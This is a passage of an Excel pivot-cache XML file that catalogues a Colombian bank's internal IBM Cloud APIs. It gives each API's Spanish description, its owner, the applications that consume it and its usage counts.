    <s v="Bankvision - BVC_Matriz MIT_ISBVC0009"/>
    <s v="BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ TMP Boton Bancolombia_BDT _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ PortalSalaDeVentas_AW1258002 _x000d__x000a_ plink_AW1206001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ APM_NU0032001 _x000d__x000a_ LifeCoach_AW1240001 _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ TabotWhatsapp_AW1165 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ NEQUIMDM_AW1011 _x000d__x000a_ creditlens_NU0038001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="193196"/>
    <n v="135705"/>
    <n v="875656"/>
    <n v="1629054"/>
    <n v="1694366"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-08T14:48:20"/>
    <s v="Tec - Customer Contact"/>
    <n v="100"/>
    <s v="Tec - Customer - Query Contact Information"/>
    <n v="100"/>
    <x v="402"/>
    <s v="API que permite realizar la consulta de información del contacto del cliente, tal como: dirección de residencia, dirección de oficina, teléfono fijo, teléfono móvil, email, entre otros."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <s v="ConsultaDatosContactoCliente/V1.0"/>
    <s v="MDM"/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ plink_AW1206001 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ GestionaNegocios_AW1302001"/>
    <n v="5057"/>
    <n v="6090"/>
    <n v="50755"/>
    <n v="102055"/>
    <n v="135621"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-10-08T17:28:04"/>
    <s v="Tec - Customer"/>
    <n v="121"/>
    <s v="Tec - Customer - Query Keys"/>
    <n v="100"/>
    <x v="403"/>
    <s v="API que permite consultar una llave de identificación especifica del cliente según una identificación de entrada. Es decir, que de un tipo y número de identificación puedo obtener la llave MDM del cliente o en otro caso, a partir de la llave MDM puedo consultar cual es la llave CIF. Permite consultar la llave especí­fica a partir de: la llave MDM, llave CIF, llave CRM y el tipo/número de identificación. Y las llaves resultantes pueden ser: la llave MDM, llave CIF, llave CRM."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <s v="ConsultaLlaveroCliente/V1.0"/>
    <s v="MDM"/>
    <s v="BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ TMP Boton Bancolombia_BDT _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ PortalSalaDeVentas_AW1258002 _x000d__x000a_ plink_AW1206001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ APM_NU0032001 _x000d__x000a_ LifeCoach_AW1240001 _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ TabotWhatsapp_AW1165 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ NEQUIMDM_AW1011 _x000d__x000a_ creditlens_NU0038001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="136592"/>
    <n v="100404"/>
    <n v="586994"/>
    <n v="906170"/>
    <n v="899335"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-01-07T16:15:55"/>
    <s v="Tec - Customer Commercial Data"/>
    <n v="101"/>
    <s v="Tec - Customer Commercial Data - Query management"/>
    <n v="101"/>
    <x v="404"/>
    <s v="API que permite realizar la consulta de la gestión comercial del cliente. Esta información esta divida en dos operaciones de la siguiente forma:  Gestión comercial: permite la consulta de información para realizar la gestión comercial al cliente, tal como: rol, responsable comercial del cliente, oficina de vinculación, nicho de mercado, segmento, subsegmento, entre otros. Gestión comercial ECA (equipo comercial amplificado): permite proveer información de otras relaciones comerciales existentes entre el cliente y los negocios especializados de moneda extranjera, inversión, fiduciaria, Leasing, etc. Tanto para Personas de las bancas personas y pymes, como para personas de la banca de empresas y gobierno."/>
    <s v="INFORMACION"/>
    <s v="Analitica y Big Data"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <s v="ConsultaGestionComercialCliente/V1.0"/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ creditlens_NU0038001 _x000d__x000a_ GestionaNegocios_AW1302001"/>
    <n v="5780"/>
    <n v="4793"/>
    <n v="33617"/>
    <n v="47380"/>
    <n v="39280"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-13T15:44:49"/>
    <s v="Tec - Leasing"/>
    <n v="111"/>
    <s v="Tec - Customer Leasing - Information"/>
    <n v="100"/>
    <x v="405"/>
    <s v="El api Tec Customer Leasing - Information permitirá a los consumidores consultar y más adelante modificar información relacionada con los clientes de Leasing."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="2815"/>
    <n v="1721"/>
    <n v="10795"/>
    <n v="21586"/>
    <n v="23472"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-01-20T11:43:10"/>
    <s v="Tec-Customer Personal Data"/>
    <n v="100"/>
    <s v="Tec - Customer Personal Data - Query Information"/>
    <n v="100"/>
    <x v="406"/>
    <s v="API que permite realizar la consulta de los datos personales del cliente: La información personal básica de un cliente, tales como: tipo documento, número documento, nombre completo, rol, datos de vinculación, entre otros. La información detallada de un cliente, tales como: fecha y ciudad de expedición de documento de identidad, fecha de nacimiento, primer nombre, segundo nombre, primer apellido, segundo apellido, genero, tratamiento del cliente, entre otros."/>
    <s v="INFORMACION"/>
    <s v="Analitica y Big Data"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <s v="ConsultaDatosPersonalesCliente/V1.0"/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ SUID_AW1310 _x000d__x000a_ PortalSalaDeVentas_AW1258002 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ creditlens_NU0038001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ GestionaNegocios_AW1302001"/>
    <n v="19758"/>
    <n v="19097"/>
    <n v="167120"/>
    <n v="287284"/>
    <n v="359576"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-18T09:18:16"/>
    <s v="Tec-Accounts"/>
    <n v="110"/>
    <s v="Tec - Deposit - Account Balance"/>
    <n v="110"/>
    <x v="407"/>
    <s v="Permite la consulta de saldo de todas las cuentas de depósitos de personas: Ahorros y corrientes."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <s v="ConsultaSaldosCuentasDepositos/V1.0"/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="GestionaNegocios_AW1302001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ NEQUICUEDEP_AW1011 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ PORTALCOBRANZA_AW1294001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-28T16:52:18"/>
    <s v="Tec - Deposits"/>
    <n v="107"/>
    <s v="Tec - Deposit - Monetary Affectation"/>
    <n v="101"/>
    <x v="408"/>
    <s v="Permite realizar la transaccionalidad de Cuentas de Ahorro/Corrientes."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <s v="AfectacionMonetariaDepositos/V1.0"/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ TMP Boton Bancolombia_BDT"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-07-07T03:52:13"/>
    <s v="Tec - Deposits"/>
    <n v="107"/>
    <s v="Tec - Deposit - Transference"/>
    <n v="106"/>
    <x v="409"/>
    <s v="Permite realizar un pago con transferencia entre cuentas de depositos de clientes Bancolombia."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="PagoConTransferencia/V1.0"/>
    <s v="Modulo de Administración de Tarjetas (MAT)_Tarjeta débito_ISMAT0001"/>
    <s v="BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ TMP Boton Bancolombia_BDT"/>
    <m/>
    <m/>
    <n v="1749"/>
    <n v="2548"/>
    <n v="5572"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-09-02T00:11:00"/>
    <s v="Tec - Email Notifications"/>
    <n v="101"/>
    <s v="Tec - Email Notifications - Send"/>
    <n v="101"/>
    <x v="410"/>
    <s v="API que permite el enví­o de correo electrónico básico o en diferentes formatos (con clave, con pdf, con adjunto base64, encriptado). A la fecha el servicio tiene como proveedor a Masivian. A continuación, se nombran estas funcionalidades: â€¢ Enví­o correo electrónico con un contenido básico.  En esta segunda versión se agrega se agrega esta operación de manera que se tiene que deprecar del servicio â€œGwe-Notification-mail-basicâ€? y migrar a esta nueva api los consumidores. â€¢ Enví­o correo electrónico con adjunto pdf generado por el banco y puesto en una ruta SFTP para que el proveedor de correo (Masivian) lo adjunte al mensaje. Pendiente por apificar y deprecar del servicio. â€¢ Enví­o correo electrónico con adjunto pdf generado por el banco y puesto en una ruta SFTP para que el proveedor de correo (Masivian) lo proteja con contraseña y lo adjunte al mensaje. Pendiente por apificar. â€¢ Enví­o correo electrónico con adjunto pdf generado por el proveedor de correo (Masivian) utilizando una plantilla previamente cargada en su sistema. Pendiente por apificar â€¢ Enví­o correo electrónico con adjunto pdf generado y protegido con clave por el proveedor de correo (Masivian) utilizando una plantilla previamente cargada en su sistema. Pendiente por apificar. â€¢ Enví­o correo electrónico con adjunto enviado en base64 en el mensaje xml, para que el proveedor de correo (Masivian) lo decodifique y lo adjunte como pdf en el mensaje. â€¢ Enví­o correo electrónico con adjunto enviado en base64 en el mensaje xml, para que el proveedor de correo (Masivian) lo decodifique, lo proteja con clave y lo adjunte como pdf en el mensaje. NOTA\: Al momento de especificar esta API, ya existí­a una con el nombre de â€œGwe-Notication-mail-basicâ€?, acoplada a la funcionalidad â€œenví­o correo básicoâ€?, adicional a lo anterior carece de un campo messageId y esto evita su trazabilidad en caso de incidente por las razones anteriores no se agregarán mas operaciones a esa API."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Masivia"/>
    <s v="MACINV-RPA20190002_AW1172001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BIZAGIAC_AW1285001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ Historia del Cliente_NU0090001"/>
    <n v="496"/>
    <n v="1138"/>
    <n v="2844"/>
    <n v="5708"/>
    <n v="8033"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-13T15:44:49"/>
    <s v="Tec - Leasing"/>
    <n v="111"/>
    <s v="Tec - Financial Leasing - Operation Information"/>
    <n v="100"/>
    <x v="411"/>
    <s v="El API Tec - Financial Leasing  Operation Information permitirá a los consumidores consultar diferente información relacionada con las operaciones de leasing financiero en estados de anticipo, definitivos o cancelados."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="3159"/>
    <n v="1921"/>
    <n v="11829"/>
    <n v="24497"/>
    <n v="26708"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-13T15:44:49"/>
    <s v="Tec - Leasing"/>
    <n v="111"/>
    <s v="Tec - Financial Operations - Payments"/>
    <n v="100"/>
    <x v="412"/>
    <s v="El API Tec Financial Operations Payments permitirá a los consumidores consultar los diferentes pagos: al dí­a, pagos anteriores, pagos futuros o en mora para las operaciones de Leasing Financiero en estado definitiva o en anticipo."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="94"/>
    <n v="67"/>
    <n v="492"/>
    <n v="1098"/>
    <n v="1047"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-13T11:56:33"/>
    <s v="Fund Administration"/>
    <n v="102"/>
    <s v="Tec - Fund Administration - Consolidated Balances"/>
    <n v="101"/>
    <x v="413"/>
    <s v="Esta API permite consultar el saldo consolidado de los fondos de inversión tanto de valores como de fiduciaria de un cliente del grupo Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaFondos/V1.0"/>
    <s v="Framework Servicios Fiduciaria_ISFSF0001"/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="4454"/>
    <n v="2696"/>
    <n v="18322"/>
    <n v="35797"/>
    <n v="49180"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-13T11:56:33"/>
    <s v="Fund Administration"/>
    <n v="102"/>
    <s v="Tec - Fund Administration - Transactions"/>
    <n v="101"/>
    <x v="414"/>
    <s v="La API permite consultar los movimientos detallados de los fondos de inversión del Grupo Bancolombia, ya sea de Valores o Fiduciaria."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaFondos/V1.0"/>
    <s v="Framework Servicios Fiduciaria_ISFSF0001"/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="87"/>
    <n v="38"/>
    <n v="299"/>
    <n v="568"/>
    <n v="851"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-11-27T17:37:23"/>
    <s v="Tec - Leasing"/>
    <n v="111"/>
    <s v="Tec - Leasing Notification - Send Reports"/>
    <n v="101"/>
    <x v="415"/>
    <s v="El API permitirá a los consumidores hacer solicitudes al back de leasing para la generación y enví­o de algún tipo de reporte de operaciones que por su volumen de información deba ser entregado en buzón seguro."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="125"/>
    <n v="69"/>
    <n v="444"/>
    <n v="1179"/>
    <n v="1473"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-06-17T18:18:30"/>
    <s v="Tec - Loans"/>
    <n v="151"/>
    <s v="Tec - Loans - Enquiry"/>
    <n v="114"/>
    <x v="416"/>
    <s v="Api que permite la consulta de los préstamos que tenga un cliente o un convenio empresarial, la consulta detallada y los movimientos de un préstamo en particular."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="ConsultaInformacionPrestamos/V2.0"/>
    <s v="STI - Sistema Transaccional de Integración_Sistema Transaccional de Integración_ISSTI0002"/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PortalLibranzas_AW0360007"/>
    <n v="32187"/>
    <n v="26144"/>
    <n v="43628"/>
    <n v="290979"/>
    <n v="439408"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-03-17T11:46:26"/>
    <s v="Tec - Loans"/>
    <n v="151"/>
    <s v="Tec - Loans - Loan Applications"/>
    <n v="100"/>
    <x v="417"/>
    <s v="En su versión inicial, esta API expone capacidades que permiten consultar los detalles relacionados con solicitudes de crédito radicadas, así­ como actualizar el estado de éstas, haciendo posible, en parte, la gestión de este proceso previo al desembolso del crédito."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="SolicitudDeCredito/V1.0_x000a_SolicitudDeCredito/Enlace/V1.0"/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PortalLibranzas_AW0360007"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-06-04T17:26:15"/>
    <s v="Tec - Loans"/>
    <n v="151"/>
    <s v="Tec - Loans - Maximum Loan Amount"/>
    <n v="103"/>
    <x v="418"/>
    <s v="Esta API expone un método que permite obtener el límite que un cliente tiene asociado a productos crediticios entre los cuales no se consideran ni Leasing ni tarjetas de crédito. "/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="ConsultaDatosCartera/V2.0"/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PortalLibranzas_AW0360007"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-03-17T11:46:26"/>
    <s v="Tec - Loans"/>
    <n v="151"/>
    <s v="Tec - Loans Collaterals"/>
    <n v="103"/>
    <x v="419"/>
    <s v="Esta API permite consultar la información general de las garantí­as asociadas a un cliente"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="ConsultaDatosCartera/V2.0"/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PortalLibranzas_AW0360007"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-26T20:39:37"/>
    <s v="Tec - Payments"/>
    <n v="124"/>
    <s v="Tec - Payments - Bancolombia Button Management"/>
    <n v="102"/>
    <x v="420"/>
    <s v="El api Tec - Payments - Bancolombia Button Management permite realizar diferentes operaciones relacionadas con el boton Bancolombia."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <s v="PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="Ecosistema De Pagos_AW1314001 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001"/>
    <n v="122"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-07-28T18:17:28"/>
    <s v="Tec - Payments"/>
    <n v="124"/>
    <s v="Tec - Payments - QR Management"/>
    <n v="112"/>
    <x v="421"/>
    <s v="El api Tec - Payments - QR Management permite generar un QR que se puede utilizar para recaudos (diferente al QR que se genera en la APP para transferencias P2P), dando la opción de generar una notificación adicional al momento del pago (diferente a las notificaciones por defecto de Aletas y Notificaciones). Adicionalmente permite solicita el enví­o fí­sico de un QR (en hablador), consultar la información de los QR generados por un comercio y la información de un QR en especí­fico."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Ecosistema De Pagos_AW1314001 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001"/>
    <n v="17"/>
    <n v="4"/>
    <n v="1788"/>
    <n v="2602"/>
    <n v="102"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-15T20:23:15"/>
    <s v="Tec - Payments"/>
    <n v="124"/>
    <s v="Tec - Payments - Transaction Logs Management"/>
    <n v="104"/>
    <x v="422"/>
    <s v="El api Tec - Payments - Transaction Logs Management permite grabar y consultar la información relacionada con las transacciones realizadas por los clientes en los diferentes servicios de aceptación de medios de pago."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Ecosistema De Pagos_AW1314001 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001"/>
    <n v="405117"/>
    <n v="326149"/>
    <n v="2243305"/>
    <n v="3636291"/>
    <n v="4072765"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-10-26T03:16:29"/>
    <s v="Tec-Security"/>
    <n v="206"/>
    <s v="Tec - Security - Encrypted key"/>
    <n v="110"/>
    <x v="423"/>
    <s v="Esta API permite entregar a un consumidor la llave o el módulos para posteriormente con este dato realizar el cifrado del pin del cliente"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GestionLlaveCifrado/V1.0"/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="TMP_SVP_APP_PFM _x000d__x000a_ TMP SOPORTE APP_lgcorrg _x000d__x000a_ TMP AW0360004_CONSTRUCTOR_SVE _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ TABOT_AW1165001 _x000d__x000a_ SVETDL_AW0360006 _x000d__x000a_ PortalLibranzas_AW0360007 _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ AppInversiones_AW1185001"/>
    <n v="4088"/>
    <n v="2553"/>
    <n v="10750"/>
    <n v="5247"/>
    <n v="4679"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-10-26T03:16:29"/>
    <s v="Tec-Security"/>
    <n v="173"/>
    <s v="Tec - Security - Encrypted key"/>
    <n v="110"/>
    <x v="423"/>
    <s v="Esta API permite entregar a un consumidor la llave o el módulos para posteriormente con este dato realizar el cifrado del pin del cliente"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GestionLlaveCifrado/V1.0"/>
    <m/>
    <s v="TMP Boton Bancolombia_BDT _x000d__x000a_ SUID_AW1310 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PortalConstructor_AW0360004 _x000d__x000a_ AppInversiones_AW1185001 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BCHerramientasMonitoreoPrd2 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ NEQUIMAPAS_AW1011 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <n v="4088"/>
    <n v="2553"/>
    <n v="10750"/>
    <n v="5247"/>
    <n v="4679"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-07-07T03:47:02"/>
    <s v="Tec - Support"/>
    <n v="102"/>
    <s v="Tec - Token DID - Consult and Send"/>
    <n v="102"/>
    <x v="424"/>
    <s v="Esta API permite realizar la consulta del tipo de enrolamiento en clave dinamica, y al mismo tiempo la generación y el envio del token ODA, dependiendo de la configuración del usuario."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <x v="4"/>
    <s v="Productor"/>
    <m/>
    <s v="Magda Catalina Trejos"/>
    <s v="GestionAutenticacionFuerte/V1.0"/>
    <s v="AutenticacionFuertes"/>
    <s v="TMP Boton Bancolombia_BDT _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="208181"/>
    <n v="143732"/>
    <n v="942430"/>
    <n v="1754325"/>
    <n v="1853012"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-11-20T18:05:31"/>
    <s v="Tec-Payments ACH Fulfillment"/>
    <n v="102"/>
    <s v="Tec - Transfer - Management"/>
    <n v="102"/>
    <x v="425"/>
    <s v="El API permite realizar las siguientes operaciones de (Envió, recibo y solicitud dinero) de forma inmediata para realizar transferencias en lí­nea a cuentas Bancolombia y otros bancos"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="CapaGestionCanal_NU0014001"/>
    <n v="68114"/>
    <n v="53184"/>
    <n v="360742"/>
    <n v="579398"/>
    <n v="725758"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-26T17:45:02"/>
    <s v="Tec-Wallet"/>
    <n v="112"/>
    <s v="Tec - Wallet - Transactional - Log"/>
    <n v="102"/>
    <x v="426"/>
    <s v="Con esta API se permitirá consultar la información de las novedades aplicadas de los clientes registrados en la Nueva Billetera.   Estas novedades incluyen:   - Registro del cliente en la billetera - Tarjetas del cliente en la billetera  - Tarjetas activas del cliente en la billetera - Tarjetas visibles del cliente en la billetera  - Tarjetas ocultas del cliente en la billetera - Tarjeta seleccionada como favorita por el cliente en la billetera (para pagos con NFC)"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
